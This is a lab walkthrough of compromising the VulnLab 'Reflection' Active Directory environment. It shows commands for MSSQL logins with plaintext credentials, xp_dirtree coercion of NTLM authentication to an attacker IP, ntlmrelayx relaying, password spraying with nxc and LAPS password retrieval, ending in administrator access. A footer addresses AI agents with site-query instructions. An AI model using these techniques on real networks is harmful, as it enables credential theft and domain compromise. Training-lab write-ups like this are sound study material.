# Reflection Enumerating the smb shares of machine #3 we find creds: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3d19190de1fea70e06489fb385a7e8a017313a8d%2Fdbeac13fcd1fe31943a9ea19ba965951.png?alt=media) Using these creds to login to mssql on machine #3 we get other creds: ``` mssqlclient.py web_staging:'Washroom510'@10.10.143.69 ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-47b3de2ff9eea249505f8e35cf4c027bd91503f4%2Fcf755f5d910fbdadd987c03d781f0e7a.png?alt=media) Now password spraying we find other accounts with same password: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b2a15a608ddca3ed9d36537b87464d624a707b2a%2F0d9438268311add55604fcce9e53df54.png?alt=media) Now doing NTLM Relay attack we get hash for an account: ``` exec xp_dirtree "\\10.8.1.208\share" ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b892df89fc805df9aa8e10068bb0a0f5c07e2da1%2Fabb91feba1b4fb6d581cc3dc1d97f1c2.png?alt=media) Now checking if message signing is disabled: ``` nxc smb 10.10.143.69-71 --gen-relay-list relay.txt ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e16d39ff2a73bf80ae44df8ca21f1ee8c005dbeb%2F2ed881e74f10e1daf811394954d5ff26.png?alt=media) It is false So starting an ntlm relay: ``` ntlmrelayx.py -tf targets.txt -socks -smb2support ``` Now we can access shares ``` proxychains smbclient \\\\10.10.197.101\\prod -U REFLECTION/SVC_WEB_STAGING ``` Now get new creds: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-29e040aa1e05e8e6b5a4a4591e3e1ac3af236bab%2F0ddd93e15a60baa6e930a017e12c79ce.png?alt=media) Now we can check with mssql on the dc: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3eef108b87ca009db1fb5f7e75d1ce52f02069f5%2F9ebefc43d402d5d1fce9b6cdb7f9e9f0.png?alt=media) We get passwords from the prod database on DC. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0ae48263c326ac6f1caa1cd7dadd100fb7b07733%2F8ed3404b3a9796f6e9d3fd4f7359ef5d.png?alt=media) Now trying responder: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cc68488ad912a5e274ade4dcac9e3ca694f4d5a1%2F4697bfdee9d0e3b48f7bf368b19a8c1b.png?alt=media) We get another user. We cant use nlm relaying as it doesnt work Now password spraying all passwords we have with the users: ``` nxc smb 10.10.197.101-103 -u users.list -p pass.txt --continue-on-success ``` Now we can use bloodhound: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-882ca9c04a6c8b73d5ce6a35d511dc3ce28319f5%2Fa84d11fc0d9467d12d5e6944297caaf7.png?alt=media) But checking MachineAccountQuota: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-4304c570438d0c4d18c5f3ffa5bb44b2df5d967a%2F892c9e4771584bd6f7673f0ad1f8159d.png?alt=media) Now we can try to get laps password ``` nxc ldap reflection.vl -u abbie.smith -p CMe1x+nlRaaWEw -M laps ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7627b69f1360a9b1b7213b633af9b654aeafaff5%2Fc96c8c5a00cd8df7852ffb99e2b24904.png?alt=media) With this password we can try to password spray: ``` nxc smb 10.10.197.101-103 -u users.list -p "H447.++h6g5}xi" --local-auth --continue-on-success ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-06b0326b85aec93af46bee1f01a021430f8a6366%2F1f82a9479f91fa5cf535391204d14400.png?alt=media) We got the administrator on ms01 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/vuln-lab/reflection-vulnlab.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.